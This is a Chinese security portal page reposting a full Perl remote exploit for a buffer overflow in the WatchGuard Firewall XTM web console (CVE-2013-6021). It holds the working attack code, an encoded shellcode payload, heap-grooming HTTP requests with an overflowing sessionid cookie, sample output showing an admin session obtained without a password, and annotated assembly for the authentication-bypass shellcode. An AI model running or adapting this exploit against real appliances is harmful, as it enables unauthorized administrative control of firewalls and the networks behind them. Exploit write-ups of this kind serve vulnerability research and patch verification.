您现在的位置: 华盟网 >> 漏洞 >> Exploit >> 正文

防火墙远程缓冲区溢出

2013/10/31 作者:不详 来源: 华盟收集
导读             #!/usr/bin/perl -w# Exploit Title: WatchGuard Firewall XTM version 1…

 

 

 

 

 

 

 

 

 

 

 

 

#!/usr/bin/perl -w
# Exploit Title: WatchGuard Firewall XTM version 11.7.4u1 - Remote buffer overflow exploit ~ sessionid cookie
# Date: Oct 18 2013
# Exploit Author: st3n@funoverip.net (a.k.a. jerome.nokin@gmail.com)
# Vendor Homepage: http://www.watchguard.com
# Version: <= 11.7.4u1
# Tested on: XTMv
# CVE : CVE-2013-6021
 
=header
*********************************************************************
**  WatchGuard Firewall XTM version 11.7.4u1                       **
**  Remote buffer overflow exploit ~ sessionid cookie              **
*********************************************************************
**                                                                 **
**            Author:  jerome.nokin@gmail.com                      **
**              Blog:  http://funoverip.net                        **
**               CVE:  CVE-2013-6021                               **
**                                                                 **
*********************************************************************
**                                                                 **
**  - Bug, exploit & shellcode details available on:               **
**    http://funoverip.net/?p=1519                                 **
**                                                                 **
**  - Decoded shellocde can be found at the end of this file       **
**                                                                 **
*********************************************************************
=cut
 
 
=output sample
 
[*] Sending HTTP ping request to https://192.168.60.200:8080 : OK. Got 'pong'
[*] Checking sessionid cookie for bad chars
[*] Checking shellcode for bad chars
[*] Heap messaging (request 1) : ...
[*] Sending authentication bypass shellcode (request 2)
[*] HTTP Response :
 
--------------------------------------------------------------------------------
HTTP/1.1 200 OK
Content-type: text/xml
Set-Cookie: sessionid=6B8B4567327B23C6643C98696633487300000014
Date: Sun, 27 Oct 2013 21:11:38 GMT
Server: none
Content-Length: 751
 
<?xml version="1.0"?>
<methodResponse>
  <params>
    <param>
      <value>
        <struct>
          <member><name>sid</name><value>6B8B4567327B23C6643C98696633487300000014</value></member>
          <member><name>response</name><value></value></member>
          <member>
            <name>readwrite</name>
            <value><struct>
              <member><name>privilege</name><value>2</value></member>
              <member><name>peer_sid</name><value>0</value></member>
              <member><name>peer_name</name><value>error</value></member>
              <member><name>peer_ip</name><value>0.0.0.0</value></member>
            </struct></value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodResponse>
--------------------------------------------------------------------------------
 
[*] Over.
=cut
 
use warnings;
use strict;
use IO::Socket::SSL;
 
# host and port of the XTM web console
my $host = "192.168.60.200";
my $port = "8080";
 
# Shellcode (watch out bad chars)
my $shellcode =
    # shellcode: bypass password verification and return a session cookie
    "PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIMQJdYHfas030mQ" .
    "KusPQWVoEPLKK5wtKOKOkOnkMM4HkO9okOoOePXpwuuXOsJgs4LMbWUTk1KNs04PUX" .
    "eXD4tKTyvgQeZNGIaOgtptC78kM7X8VXGK6fWxnmPGL0MkzTKoVegxmYneidKNKOkO" .
    "9WK5HxkNYoyoUPuP7pGpNkCpvlk9k5UPIoKO9oLKnmL4KNyoKOlKk5qx9nioioLKNu" .
    "RLKNioYoMY3ttdc4NipTq4VhMYTL14NazLxPERuP30oqzMn0G54OuPmkXtyOeUtHlK" .
    "sevhnkRrc8HGW47TeTwpuPEPgpNi4TwTMnNpZyuTgxKOn6K90ELPNkQU7xLKg0r4oy" .
    "ctQ45TlMK35EISKOYoMYWt14MnppMfUTWxYohVk3KpuWMY0Empkw0ENXwtgpuPC0lK" .
    "benpLKSpF0IWPDQ4Fh30s0Wp5PlMmCrMo3KO9olIpTUts4nic44dMnqnyPUTTHKOn6" .
    "LIbeLXSVIW0EMvVb5PKw3uNt7pgpWpuPiWpEnluPWpwpGpOO0KzN34S8kOm7A";
 
# Shellocde max length
my $shellcode_max_len = 2000;
 
 
# set our shellcode address into EAX (expected by alpha2 encoder)
my $alpha2_ecx24 =
        "\x8b\x41\x24" .        # mov    eax, [ecx+0x24]
        "\x29\xd0" .            # sub    eax, edx ; (edx is updated by nopsled)
        "\x83\xc0\x40" .        # add    eax, 0x40
        "\x83\xe8\x35";     # sub    eax, 0x35
        # for the reader, "add eax, edx" contains bad chars.
    # This is the reason why the nopsled decrement EDX and that we use "dec eax, edx"
 
 
# flush after every write
$| = 1;
 
# HTTP POST data for authentication request
my $login_post_data =
"<methodCall><methodName>login</methodName><params><param><value><struct><member>" .
"<name>password</name><value><string>foo</string></value></member><member>" .
"<name>user</name><value><string>admin</string></value></member></struct></value>" .
"</param></params></methodCall>";
 
# list of bad characters
my @badchars = (
    "\x00",
        "\x01", "\x02", "\x03", "\x04", "\x05", "\x06", "\x07", "\x08", "\x0a",
        "\x0b", "\x0c", "\x0d", "\x0e", "\x0f", "\x10", "\x11", "\x12", "\x13",
        "\x14", "\x15", "\x16", "\x17", "\x18", "\x19", "\x1a", "\x1b", "\x1c",
        "\x1d", "\x1e", "\x1f",
        "\x20", "\x22", "\x26", "\x27", "\x3b" # cookie delimiters
);
 
 
# function: Check input for badchars.
sub check_badchars {
    my $in = shift;
    my $stop = 0;
    for(my $i=0; $i<length($in); $i++){
        my $c = substr($in,$i,1);
        if($c ~~ @badchars){
            printf " - bad char '0x%02x' found\n", ord($c);
            $stop = 1;
        }
    }
    if($stop){ exit; }
}
 
# function: testing remote connectivity with the appliance
# send HTTP "ping" request and expect "pong" reply
sub testing_connectivity {
 
    print "[*] Sending HTTP ping request to https://$host:$port : ";
        my $sock = IO::Socket::SSL->new( PeerHost => "$host", PeerPort => "$port") or die "SSL: $!";
 
        if($sock){
        my $req =
            "GET /ping HTTP/1.0\r\n" .
            "Host:$host:$port"  . "\r\n" .
            "\r\n";    
 
        # send ping
        print $sock $req;
        my $resp='';
        my $pong = 0;
        # read answer
        while (my $line = <$sock>){
            if($line =~ /pong/) { $pong = 1;}
            $resp .= $line;
        }
        # got pong ?
        if($pong){
            print "OK. Got 'pong'\n";
        }else{
            print "ERROR. Expecting 'pong' response but received :\n";
            print $resp;
            exit;
        }
                close $sock;
        }else{
                print "ERROR: Socket failed !\n";
                exit;
        }
}
 
 
# function: HTTP request used for HEAP messaging phase
sub building_request_step1 {
    my $sessionid = "A" x 120; # do not overflow now
        my $req =
                "POST /agent/ping HTTP/1.1\r\n" .
                "Host:$host:$port"  . "\r\n" .
                "User-Agent: " . "a" x 100 . "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0  " . "a" x 100  . "\r\n" .
                "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, " . "a" x 992 . "\r\n" .
                "Accept-Language: en-gb,en;q=0.5" . "a" x 200 . "\r\n" .
                "Cookie: sessionid=" . $sessionid . "\r\n" .
        "Accept-Charset: utf-8\r\n" .
        "Content-Type: application/xml\r\n" .
                "Content-Length: 3\r\n" .
                "\r\n" .
                "foo" ;
    return $req;
}
 
# function: HTTP request used for buffer overflow exploitation
sub building_request_step2 {
 
    my $sessionid =
        "A" x 140 .     # junk
        "\x44\x85" ;    # off by 2 overflow to reach  0x8068544 (on the heap).
                # 0x8068544 contains a "good memory chunk" which satisfy all rules
 
    print "[*] Checking sessionid cookie for bad chars\n";
    check_badchars($sessionid);
 
        my $req =
                "POST /agent/ping HTTP/1.1\r\n" .
                "Host:$host:$port"  . "\r\n" .
                "User-Agent: " . "a" x 1879  . "\r\n" .
                "Connection: keep-alive"  . "a" x 22 .
                "\x4a" x ($shellcode_max_len - length($shellcode) - length($alpha2_ecx24))  .   # nops
                $alpha2_ecx24 . # set EAX to shellcode addr
                $shellcode .    # shellcode
                "\r\n" .
        "Accept-Encoding: identity," . "b" x 1386 . "\r\n" .
                "Cookie: sessionid=" . $sessionid . "\r\n" .
        "Accept-Charset: utf-8\r\n" .
        "Content-Type: application/xml\r\n" .
                "Content-Length: " . length($login_post_data). "\r\n" .
                "\r\n" .
                $login_post_data ;
 
    return $req;
}
 
# function: Send an HTTP request.
sub send_http_request {
 
    my $req = shift;
    my $read_answer = shift || 0;
    my $http_resp='';
 
    # Open socket
    my $sock = IO::Socket::SSL->new( PeerHost => "$host", PeerPort => "$port") or die "SSL: $!";
 
    if($sock){
                print $sock $req;
 
        # do we need the answer ?
        if ($read_answer){
            my $is_chunked = 0;
            my $is_body = 0;
                    while(my $line = <$sock>){
 
                if($line =~ /Transfer-Encoding: chunked/){
                    $is_chunked = 1;
                    next;
                }
                 
                if($line eq "\r\n"){
                    # we reached the body
                    if($is_chunked){
                        $line = <$sock>; # chunk length
                        $line =~ s/\r\n//g;
                        $sock->read(my $data, hex($line)); # read chunk
                        $http_resp .= sprintf "Content-Length: %d\r\n\r\n", hex($line);
                        $http_resp .= $data;
                        close $sock ;
                        return $http_resp;
                    }
                }
                 
                $http_resp .= $line;
            }
        }
                close $sock;
    }else{
            print "ERROR: Socket failed !\n";
            exit;
    }
    return $http_resp;
}
 
 
 
### MAIN ####
 
 
# print banner
print << 'EOF';
**********************************************************
**  WatchGuard Firewall XTM version 11.7.4u1            **
**  Remote buffer overflow exploit ~ sessionid cookie   **
**********************************************************
**                                                      **
**  Author:  jerome.nokin@gmail.com                     **
**    Blog:  http://funoverip.net                       **
**     CVE:  CVE-2013-6021                              **
**                                                      **
**********************************************************
**                                                      **
**  Bug, exploit & shellcode details available on:      **
**  http://funoverip.net/?p=1519                        **
**                                                      **
**********************************************************
 
EOF
 
 
# Send an HTTP ping request
testing_connectivity();
 
# building HTTP requests
my $request_step1 = building_request_step1();
my $request_step2 = building_request_step2();
 
# Testing shellcode against bad cahrs
print "[*] Checking shellcode for bad chars\n";
check_badchars($shellcode);
 
# Fillin the heap
print "[*] Heap messaging (request 1) : ";
for(my $i=0 ; $i<3 ; $i++){
    send_http_request($request_step1);
    print ".";
}
print "\n";
 
# Exploiting
print "[*] Sending authentication bypass shellcode (request 2)\n";
my $resp = send_http_request($request_step2,1);
print "[*] HTTP Response : \n\n";
 
print "-" x 80 . "\n";
print $resp;
print "-" x 80 . "\n\n";
 
 
print "[*] Over.\n";
exit;
 
 
=shellcode
;------------------------------------------------
; shellcode-get-gession.asm 
; by Jerome Nokin for XTM(v) 11.7.4 update 1
;------------------------------------------------
 
global _start
_start:
 
 
    ; current EBP/ESP values
    ;-------
    ; esp            0x3ff0b518   
    ; ebp            0x3ff0b558   
 
 
    ; first, fix the stack in HTTP_handle_request function
    ; -------
    ; esp           0x3ff0b6f0 
    ; ebp           0x3ffffcb8 
 
    ; we'll do
    ;---------
    ;$ perl -e 'printf "%x\n", 0x3ff0b518 + 472'
    ; 3ff0b6f0
    ; ESP = ESP + 472
    ;$ perl -e 'printf "%x\n", 0x3ff0b558 + 1001312'
    ; 3ffffcb8
    ; EBP = EBP + 1001312
 
    ; fix ESP/EBP
    add     esp, 472
    add     ebp, 1001312
 
 
    ; fixing overwritten ptrs
 
 
    ; finding initial malloc pointer v50 (overwritten)
    ; 0805f000-08081000 rwxp 00000000 00:00 0          [heap]
 
    ; v54 and v55 have not been overwritten and contain *(v50+0x10) and *(v50+0x14)
 
    ; example inside gdb
    ;b *0x8051901
    ;b *0x80519c0
    ;(gdb) x/xw $ebp-0xf8       <===== v55
    ;0x3ffffbc0:    0x08065b90
    ;(gdb) x/xw $ebp-0xfc           <===== v54                           
    ;0x3ffffbbc:    0x08067fe0
    ;(gdb) find /w 0x08060000, 0x0806ffff, 0x08067fe0, 0x08065b90   <==== search seq on heap
    ;0x8063b48
    ;1 pattern found.
    ;(gdb) x/xw 0x8063b48-0x10  <==== initial malloc ptr (v50) is at 0x8063b48-0x10
    ;0x8063b38: 0x00000001
 
    ; search this sequence on the heap
    mov eax, [ebp-0xfc] ; v54
    mov ebx, [ebp-0xf8] ; v55
 
    mov edi, 0x0805f000     ; heap start addr
loop:
    add edi, 4
    lea esi, [edi+4]
    cmp     esi, 0x08081000     ; edi is out of the heap ?
    je  loop_end
    cmp [edi], eax      ; cmp v54
    jne loop
    cmp     [edi+4], ebx        ; cmp v55
    je  found
    jmp loop
     
loop_end:
    mov eax, 0x08063b38     ; default value (should not be reached)
 
found:
    lea eax, [edi-0x10]     ; eax = v50 address (malloc ptr addr)
     
        ; EBP-0x10c
        ; saved content of v50 (malloc) = ebp-0x10c
        mov     [ebp-0x10c], eax
 
        ; reset EBX (see following)
        ; 805185c:       e8 95 43 00 00          call   8055bf6 <wga_signal+0x784>
        ; 8051861:       81 c3 93 c7 00 00       add    ebx,0xc793
        ; ....
        ; 8055bf6:       8b 1c 24                mov    ebx,DWORD PTR [esp]
        ; 8055bf9:       c3                      ret   
        mov     ebx, 0x805dff4
 
    ; EBP-0x108
    ; just reset it to 0
    mov     dword [ebp-0x108], 0x0
     
    ; EBP-0x100
    ;  80519b1:       8b 40 0c                mov    eax,DWORD PTR [eax+0xc]
    ;  80519b4:       89 85 00 ff ff ff       mov    DWORD PTR [ebp-0x100],eax
    mov eax, [eax+0xc]
    mov [ebp-0x100], eax
 
 
    ; simulate call to login function. copy args
    mov ecx, [ebp-0x10c]
    mov eax, [ebp-0x198]
    mov edx, [ebp-0x194]
    mov [esp+0x4],eax
    mov [esp+0x8],edx
    mov [esp],ecx
 
 
    ; Now setup the login function stack
 
    ; current esp/ebp
    ; ----------------
        ; esp           0x3ff0b6f0     
        ; ebp           0x3ffffcb8
 
    ; we want to land into the login function
    ; ---------------------------------------
    ; esp            0x3ff0b420
    ; ebp            0x3ff0b6e8
 
    ; we'll do
    ;---------
    ; $ perl -e ' printf "%x\n", 0x3ff0b6f0 - 720'
    ; 3ff0b420
    ; ESP = ESP - 720
    ; $ perl -e ' printf "%x\n", 0x3ffffcb8 - 1000912'
    ; 3ff0b6e8
    ; EBP = EBP - 1000912
 
    ; stack fix
    sub     esp, 720
    sub     ebp, 1000912
 
 
    ; EBX -> .GOT (same as above btw)
    mov ebx, 0x805dff4
 
 
        ; simulate "decode HTTP content" fct, at top of the login function
        mov     edx, [ebp+0x8]
        mov     edx, [edx+0x8]
        mov     dword [esp+0x4], 0x0            ; no content_encoding header
        mov     [esp], edx
        mov     esi, 0x0804d990
        call    esi                             ; decode content
        mov     [ebp-0x70],eax                  ; int decoded_content; // [sp+258h] [bp-70h]@1
 
 
    ; simulate "search remote_address"
    mov eax, [ebp+0x8]
    mov eax, [eax+0x14]
    mov [esp+0x4],eax
    lea eax,[ebx-0x3ceb]
    mov [esp],eax
    mov esi, 0x804b670          ;FCGX_GetParam
    call    esi
    add eax, 0x7            ; remove '::ffff:'  ====> to improve
    mov [ebp-0x60],  eax
 
 
    ; is_admin = 4
    mov dword [ebp-0x48], 0x4
 
 
    ; simulate "search req_user value"
    mov eax, [ebp-0x70]
    mov     eax, [eax+0x50]
    mov dword [esp+0x8],0x0
    lea edx,[ebx-0x3c93]
    mov [esp+0x4],edx
    mov [esp],eax  
    mov esi, 0x804c07e
    call    esi             ; <FCGX_PutStr@plt+0x3de>
    mov [ebp-0x68],eax
 
 
    ; v49 = 2 (ipv4)
    mov word [ebp-0x5a], 0x2        ; unsigned __int16 v49; // [sp+26Eh] [bp-5Ah]@1
 
    ; challenge
    mov dword [ebp-0x6c], 0x0       ; const char *req_challenge; // [sp+25Ch] [bp-6Ch]@1
 
    ; set v43 to null
    mov dword [ebp-0x74], 0x0       ;int v43; // [sp+254h] [bp-74h]@1
 
 
    ; ok, we are ready to jump in the middle of the "login" function
    ; right after the password verification
 
    ; jump here
    ; 804ee4b:       c7 44 24 04 00 12 00    mov    DWORD PTR [esp+0x4],0x1200
    ; 804ee52:       00
    ; 804ee53:       c7 04 24 01 00 00 00    mov    DWORD PTR [esp],0x1
    ; 804ee5a:       e8 11 c4 ff ff          call   804b270 <calloc@plt>
 
    mov edi, 0x804ee4b
    jmp edi
=cut
                  微信群名称:华盟黑白之道二群     华盟-黑白之道⑦QQ群: 9430885

  • 上一篇漏洞:

  • 下一篇漏洞:
  • 网友评论
      验证码
     

    关注

    分享

    0

    讨论

    2

    猜你喜欢

    论坛最新贴